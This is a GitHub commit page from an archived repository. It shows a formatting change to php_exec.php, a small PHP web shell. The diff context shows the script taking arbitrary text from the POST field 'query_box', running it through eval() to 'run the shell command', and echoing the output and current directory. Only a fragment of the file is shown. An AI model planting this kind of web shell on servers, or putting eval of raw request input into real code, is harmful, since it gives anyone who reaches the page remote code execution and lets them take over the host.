Skip to content
This repository was archived by the owner on Sep 23, 2022. It is now read-only.

Commit fce985c

Browse files
authored
Update php_exec.php
Fixed formatting
1 parent df1a186 commit fce985c

1 file changed

Lines changed: 1 addition & 1 deletion

File tree

php_exec.php

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -23,9 +23,9 @@
2323
echo "<br>Current directory: $cwd<br>";
2424
$shell = $_POST['query_box'];
2525
if (!empty($_POST['query_box'])) {
26+
echo "<br><b>Output: </b><br>";
2627
//Run the shell command
2728
$run = eval($shell);
28-
echo "<br><b>Output: </b><br>";
2929
echo "<pre>$run</pre>";
3030
}else{
3131
echo "<b>Nothing has been run yet.</b>";

0 commit comments

Comments
 (0)